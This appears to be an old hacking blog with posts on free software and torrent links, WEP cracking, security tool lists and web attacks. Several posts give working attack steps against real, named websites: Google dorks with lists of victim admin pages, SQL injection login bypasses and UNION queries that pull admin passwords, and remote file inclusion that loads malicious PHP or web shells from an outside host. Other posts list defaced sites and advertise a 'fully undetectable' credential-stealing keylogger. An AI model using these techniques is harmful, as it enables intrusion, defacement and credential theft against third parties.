Sunday

Free Useful Sites!!!!

I Know Some Useful Sites And I Went To Share with U
For Software & Games
Software-
http://premiumgamesbond.webs.com/apps/fo...s-software

For Games-
http://premiumgamesbond.webs.com/apps/blog/

For Live TV-
http://wwitv.com/television/99.htm

Torrents search engine-
http://torrentz.eu/

Best Way To Download As Premium 2Gb /DAY
http://premiumgamesbond.webs.com/apps/fo...ow/4899149

Thursday

How To Get Rid Of Facebook New Chat?

Most among you will not be happy with Facebook new chat like me. As it seems weird & you can't see all your online friends. I'm not telling about any trick or hack, it's just a way by which you can easily chat with your friends.
Go to this link https://www.facebook.com/presence/popout.php
Here you can easily chat with your friends.
For better convenience, bookmark this link.
Do whatever you want in Facebook while opening Facebook popout chat in one tab.

How To Add Meta Description For Each Blogger Post?

Adding meta description for each blogger post is the important factor in SEO. It helps in better understanding of your posts while searching in Google. Follow these steps:
Login to Blogger.
Backup your template.
Go to Design> Edit HTML
Find the code:
<data:blog.pageName/> | <data:blog.title/>
Paste the following code below above code:

So your new code will become like:
<data:blog.pageName/> | <data:blog.title/>

Preview it & Save Template.

Tuesday

Proxie Programms

how to stay anonym in the internet ?? You have much opportunities. You can use VPN connections or a proxy server.
The programms i show you in this thread you can use to stay anonym. You only need to download and install them and you can surfe anonym. Open them and connect to the server You wont surf with your own ip you will use the ip of the server
○ Ultra VPN download http://download.cnet.com/UltraVPN/3000-2144_4-10917371.html?tag=mncol
○ Loki VPN download http://download.cnet.com/Loki-VPN-Client/3000-2648_4-10804862.html?tag=mncol
○ TOR download http://www.torproject.org/download/download.html.en
○ Cyber Ghost download http://download.cnet.com/CyberGhost-VPN/3000-2144_4-75145993.html
○ Proxy Master download http://www.brothersoft.com/proxymaster-287751.html

Crack WEP Tutorial WEP cracking

:heart:More Cracking WEP GUIDES and Information From
Intro:
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).


Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);

CODE

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:

CODE

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone

Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:

CODE

If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./wlanng.sh start wlan0 [comes with AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
#./airodump
[version crap]
usage: ./airodump [mac filter]
e.g
./airodump wlan0 linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):

CODE

capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):

CODE

aircrack 2.1 - © 2004 Christophe Devine
usage: ./aircrack [options] ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

e.g
./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial
POSTED BY PYPIYU AT 10:44 AM
1 COMMENTS:

moku said...
how-to-change-office-2007-product-key

You may need to alter or change Microsoft Office 2007 (aka 2007 Microsoft Office System programs and suites) product license key or volume license key (VLK) which also known as serial number or CD key.

You can modify or change product key for 2007 Microsoft Office programs or suites by first uninstall or remove Microsoft Office and then reinstalling the business productivity suite. However, you can follow the following steps in order to reset and change the Microsoft Office 2007 product serial key without the need to uninstall or reinstall 2007 Office system suites.

Note: The following steps involve modification of registry key values, which may corrupt your Windows if done incorrectly. Backup registry first before performing the workaround.

1. Close all Microsoft Office programs.

2. Click on Start button, then click on Run.

3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.

4. Locate and then click the following subkey:

HKEY_LOCAL_MACHINE \Software\Microsoft\Office\12.0\Registration

Inside, you will find another subkey that resembles the following subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}

5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.

6. Under the Registration subkey, there may be several Globally Unique Identifiers (GUID) subkey that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.
If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:

ProductName=Microsoft Office Professional Plus 2007

7. After you find the GUID subkey that contains your Office product or program which you want to remove the existing product license key or registration details, delete the following registry entries by right clicking on the registry entry in the GUID subkey, click Delete, and then click Yes:

• DigitalProductID
• ProductID

8. Exit Registry Editor.

9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.

10. Type in the valid and genuine product key, and then click OK.

11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.

12. Microsoft Office 2007 will be updated with new product CD key or volume license key, and ready for activation (if it’s a non-VLK serial) or use.

Note: If you’re having problem with your new Office 2007 product key, simply double click on the backup registry .reg file created at the optional step above to restore the registry settings of the Registration subkey so that the original value can be imported back to the registry.

You may need to reset to change Office 2007 product key with the above steps if you don’t want to uninstall or reinstall Microsoft Office 2007 again in many scenarios, such as you have just bought a retail version of Office 2007, or receive Office 2007 as a gift, or win MS Office 2007 as a prize, or just get your MSN product key for Office 2007, or having problem with activation process online or via phone, or unable to step-up or convert evaluation copy of Office 2007 to full-use version, or having problem with Office Genuine Advantage (OG) validation.

On the other hand, if you manage to find a valid and genuine volume license key or VLK, you can change the product key of Microsoft Office 2007 with the VLK serial in order to bypass the Office 2007 activation process (as Office 2007 still using WPA 1.0 where corporate users need not to activate), without the need of crack or hack for Office 2007, for full use for unlimited period as long as you’re not caught by OGA

Monday

OS Fingerprinting Tools

OS Fingerprinting Tools :-
Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.

Home:- http://www.insecure.org
Latest Release:- Nmap 5.50
Download:- http://nmap.org/download.html



P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more!

Home:- http://lcamtuf.coredump.cx/p0f.shtml
Latest Release:- p0f v2 (2.0.8)
Download:- http://lcamtuf.coredump.cx/p0f.shtml

Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach.

Password Crackers

Password Crackers :-

Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols..


Home:- http://www.oxid.it
Latest Release:- cain & abel v4.9.40
Download:- http://www.oxid.it/cain.html

A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.


Home:- http://www.openwall.com
Latest Release:- John the Ripper 1.7
Download:- http://www.openwall.com/john/

THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.


Home:- http://www.thc.org
Latest Release:- THC-Hydra v5.4
Download:- http://freeworld.thc.org/thc-hydra/
Pwdump :- Windows password recovery tool.
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

Home:- http://www.foofus.net/fizzgig/pwdump
Latest Release:- pwdump6 version 1.7.2
Download:- http://swamp.foofus.net/fizzgig/pwdump/downloads.htm

RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

Home:- http://www.antsight.com
Latest Release:- rainbowcrack v1.2
Download:- http://www.antsight.com/zsl/rainbowcrack/

Brutus:- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.

Home:- http://www.hoobie.net
Latest Release:- brutus-aet2
Download:- http://www.hoobie.net/brutus/brutus-download.html

Sunday

Vulnerability Scanners

Vulnerability Scanners :-


Nessus :- Premier UNIX vulnerability assessment tool
Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Home:- http://www.nessus.org
Latest Release:- Nessus 4
Download:- http://www.nessus.org/download/


GFI LANguard :- A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches.

Home:- http://www.gfi.com
Latest Release:- GFI LANguard Network Security Scanner 8
Download:- http://www.gfi.com/lannetscan/


Retina :- Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

Home:- http://www.eeye.com
Latest Release:- Retina Network Security Scanner v5.15.7
Download:- http://www.eeye.com/html/Products/Retina/index.html


Core Impact :- An automated, comprehensive penetration testing product. it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes.

Home:- http://www.coresecurity.com
Latest Release:- Core Impact 4.0
Download:- http://www.coresecurity.com/

Packet Sniffers

Ethereal :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Home:- http://www.wireshark.org
Latest Release:- Wireshark 1.0.4 (Ethereal)
Download:- http://www.wireshark.org/download.html



Kismet :- A powerful wireless sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

Home:- http://www.kismetwireless.net
Latest Release:- Kismet-2008-05-R1
Download:- http://www.kismetwireless.net/download.shtml



Tcpdump :- The classic sniffer for network monitoring and data acquisition. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library.

Home:- http://www.tcpdump.org
Latest Release:- TCPDUMP 4.0.0
Download:- http://www.tcpdump.org/



Ettercap :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

Home:- http://ettercap.sourceforge.net
Latest Release:- Ettercap NG-0.7.3
Download:- http://sourceforge.net/projects/ettercap/



DSniff :- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

Home:- http://www.monkey.org
Latest Release:- dsniff-2.3
Download:- http://www.monkey.org/~dugsong/dsniff/

Saturday

Port Scanners

Port Scanners :-
Nmap:-

This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.

Home:- http://www.insecure.org
Latest Release:- Nmap 5.50
Download:- http://nmap.org/download.html

Encryption Tools

Encryption Tools :-
GnuPG / PGP :- Secure your files and communication with the advanced encryption. PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.

http://www.gnupg.org/
http://www.pgp.com/

OpenSSL :- The premier SSL/TLS encryption library. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.
http://www.openssl.org/


Tor :- An anonymous Internet communication system Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
http://tor.eff.org/


Stunnel :- A general-purpose SSL cryptographic wrapper. The stunnel program is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code.
http://www.stunnel.org/


OpenVPN :- A full-featured SSL VPN solution. OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.
http://openvpn.net/


TrueCrypt :- Open-Source Disk Encryption Software for Windows and Linux. TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.
http://www.truecrypt.org/

Friday

osCommerce Remote Edit Site Info Vulnerability

# Vendor or Software Link: http://www.oscommerce.com
# Version: N/A
# Category:: webapps
# Google dork:intitle:"osCommerce" inurl:"/admin/configuration. php?"

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
demo site
http://montra.zdnic.com/admin/configuration.php
http://goldenox.com/admin/configuration.php
http://petsupplies.foryou.com.au/admin/c...ration.php
http://www.funpinswork.com/admin/configuration.php
http://montra.zdnic.com/admin/configuration.php

Exploit
you can edit Site Info

exm site name ....
0r You you can put the Java script

useful programms

here is a list of some useful programms
Acunetix Webscanner : to scan each site realy a great programm
download http://www.heise.de/software/download/acunetix_web_vulnerability_scanner/30866
Havij : A site scanner too but it has some md5 cracker and a admin panel finder.
download http://www.mediafire.com/?qk87wpnw3bi8l8c
Cyber Ghost : Its a vpn connection programm to hide your Ip. Like Proxy master.
download http://www.chip.de/downloads/CyberGhost-VPN-2011_30719582.html
BrutusA2: A programm for a brute force attack realy useful
download :http://www.hoobie.net/brutus/brutus-aet2.zip%20
Passwordspro: A useful md5 cracker
download:http://www.pcfreunde.de/download/d10286/passwordspro/

Thursday

Some More Mass Deface

http://www.radiobalance.com/maya.htm

http://www.sklep.modelina.net/maya.htm

http://www.terazrosja.pl/maya.htm

http://www.zdrowematerace.pl/maya.htm

Hyperactive PC Admin Auth Bypass!!!

Google dork:"Website by Hyperactive PC, L.L.C."
Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
# 1-www.minnechauggolf.com/admin_login.asp
# 2-thecourseatyale.org/admin_login.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password : 'or''='

Wednesday

Entrack: Internet Admin Auth Bypass

Category:: webapps
# Google dork:"Entrack: Internet"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
# 1-packageexpress.net/entrack/admin.asp
# 2-mecourier.com/entrack/admin.asp
# 3-cannondelivery.com/entrack/admin.asp
# 4-cannondelivery.com/entrack/admin.asp
# 5-barefootmailmoms.com/entrack/admin.asp
# 6-rudysrush.com/entrack/admin.asp
# 7-sunrisedeliverykc.com/entrack/admin.asp
# 8-rfmcourier.com/entrack/admin.asp
# 9-dixiefreight.com/entrack/admin.asp
# 10-atlasdelivery.com/entrack/admin.asp
# 11-atlantadash.com/entrack/admin.asp
# 12-directlogisticstransport.com/entrack/admin.asp
# 13-cityexpressinc.com/entrack/admin.asp
# 14-redlinecourier.com/entrack/admin.asp
# 15-callcouriernow.com/entrack/admin.asp
# 16-korucutech.com/entrack/admin.asp
# 17-efficientdeliveryservice.com/entrack/admin.asp
# 18-actfastdelivery.com/entrack/admin.asp
# 19-cannondelivery.com/entrack/admin.asp
# 20-otwcourier.com/entrack/admin.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password : 'or''='

How to bypass a keylogger, by fooling it.?

Hey guyzz today i m writing a small post on bypassing a keylogger , i found many of my friends asking me that , how to bypass a keylooger? if installed in any computer which we are unkown as now a days evry body uses keyloggers , hidden trojans/servers, to spy on each nd evry activity on us . so, with this trick u can confuse a key logger to read the correct keystrokes.

lets move on to the main part.

1. Whenever u type a password on a webpage to access ur account first of all never write the full password.
say for example i m taking a password DEVENDRA.
first thing u should type is ENDR. now second thing keep ur hands off from the keybord nd just put your cursor back to the starting of password only with mouse nd type DEV, now aagain do d same thing nd take your cursor to d last place nd type A . now u can see d password is correctly entered in the block ie "DEVENDRA" but the keylogger will read the keystrokes as ENDRDEVA. lolzz
using such type of method we can confuse /fool the keylogger nd the one who sypies on you.




2.Additionally ,you can also use spaces with you passwords as spaces are not readable. Use 2-3 spaces after or in the end (as prefix) for all your passwords. Gmail, yahoo , Facebook & so many other services supports spaces in password field.


so, just use certain methods like this nd m sure u will easily bypass keyloggers .

Tuesday

SQL Injection with error

Ok in this tutorial I will show you how to hack a website with a MySQL Error ok lets follow this steps and you will get your
destiantion.
1. Check if your target is vulnverable.
http://www.target.com/id=2 //no error
http://www.target.com/id=2# //error or something is missing-> Website is vulnverable
2.column
http://www.target.com/id=2 order by 1 (no error)
http://www.target.com/id=2 order by 2 (no error)
http://www.target.com/id=2 order by 3 (no error)
http://www.target.com/id=2 order by 4 (no error)
http://www.target.com/id=2 order by 5 (errror) --> website has 4 columns if this method dosnt work use oder by 1--
3. Most vunlverable
http://www.target.com/id=2 union select 1, 2, 3, 4 --> if this methode dosnt work use
http://www.target.com/id=2 and 1=2 union select 1, 2, 3, 4--
4. Getting version
http://www.target.com/id=2 union select 1, 2,@@version(),4--
5. Geting Table name
http://www.target.com/id=2 union select 1, 2,group_concat(table_name), 4 from information_schema.tables where table_schema=database()--
6. Getting column
http://www.target.com/id=2 union select 1, 2, GROUP_CONCAT (column_name) ,4, FROM information_schema.columns WHERE table_name=mysqlchar--
now we got the Column names. lets use them
http://www.target.com/id=2 union_select 1, 2, group_concat(admin_id,0x3a,admin_password),4 from admin--

Ok now he have the Adminname and the adminpassword
Now you only have to search the admin login panel and to login.
you can use Acunetix Scanner or Havij to get it

Basic website hacking

I’ll be posting something new for the beginners in the world of hacking. Today I tell you how to hack websites using common vulnerabilities.

Note: I believe you have some basic knowledge of HTML and PHP Intended for educational purpose. Bad intentions, GET LOST!!!!!!!

So lets begin

SQL Injection

SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that’s in the
database.

Example Vulnerable Code – login.php (PHP/MySQL)

Here’s an example of a vulnerable login code
PHP Code:
php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo(“

“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>
Basically what this code does, is take the username and password input, and takes the users’s IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably injectable. If it doesn’t display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not injectable.
The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since the code doesn’t filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put “Administrator” in the username box, and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND `password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the password requirement, because as we all know, the logic of “OR” only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the ‘comment out’ character for SQL which means it ignores everything after it, otherwise the last “‘” would ruin the syntax, and just cause the query to fail.
XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code – search.php (PHP)
PHP Code:
php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “XSS”. If the site is vulnerable to XSS, you will see something like this: XSS, else, it’s not vulnerable.
Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you don’t know what it is) by tricking them into clicking on a link pointed to “search.php?search=// “. This will output “You searched for // . There were no results found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to abc.
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code – index.php (PHP)
PHP Code:
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>
Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing “index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s not vulnerable to RFI or LFI.
Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.

Monday

File Inclusion

ok in this tutorial I will show you how to hack a website with Local File Inclusion.
Ok now do this step by step and you will get your destination
You need the following things :
c99 and r57 shells download of of them
http://www.localroot.net/
a browser like firefox
and google.
Ok lets begin
1) search a website. Open the dorklist in Hacking Tutorials section and copy one of them in google and search. Now you have many opportunities open of the sites you see.
2)Now lets check if the site is vulnerable. do it like in this example.
http://www.target.com/index.php?id=3 -> change it to
http://www.target.com/index.php?id=http://google.de
if you come to the normal google page the site is vulnverable.
3) Ok now search a free hosting company. Create a account there. Now upload one of the shells (c99, r57). If you did this open the link on which your shell is.
example: http://www.freehoster.com/index.php?id=3242
4) now go back to your victim site
and change the url
http://www.target.com/index.php?id=3 to
http://www.target.com/index.php?id=http:...p?id=3242?
5) finish

Rapzo Logger v 1.5 ( Public Edition )



Virus Results By Scan4yo
u.net 0/32 "(Paid Host )

Options

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]


* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
